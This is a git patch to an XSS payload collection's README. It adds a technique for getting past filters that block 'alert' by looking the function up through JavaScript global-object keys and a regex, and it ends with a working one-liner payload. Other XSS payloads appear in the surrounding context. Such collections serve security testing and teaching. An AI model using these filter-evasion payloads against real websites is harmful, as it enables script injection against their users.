From 286f7caaa33bebbf1d2aca38721853552fb14246 Mon Sep 17 00:00:00 2001 From: clem9669 <18504086+clem9669@users.noreply.github.com> Date: Tue, 3 Dec 2019 15:24:24 +0100 Subject: [PATCH] Bypass XSS filters on alert Bypass XSS filters using javascript global variables based on the following article https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/ from theMiddle. --- XSS Injection/README.md | 34 +++++++++++++++++++++++++++++++++- 1 file changed, 33 insertions(+), 1 deletion(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 0e1edee..1fe1978 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -679,6 +679,38 @@ content['alert'](6) [12].forEach(alert); ``` +From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables + +The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**. + +```javascript +c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; } +// 5 +``` + +Then calling alert is : + +```javascript +Object.keys(self)[5] +// "alert" +self[Object.keys(self)[5]]("1") // alert("1") +``` + +We can find "alert" with a regular expression like ^a[rel]+t$ : + +```javascript +a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a() + +// then you can use a() with Object.keys + +self[Object.keys(self)[a()]]("1") // alert("1") +``` + +Oneliner: +```javascript +a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1") +``` + From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet. ```javascript @@ -1075,4 +1107,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) - [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) -- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) \ No newline at end of file +- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)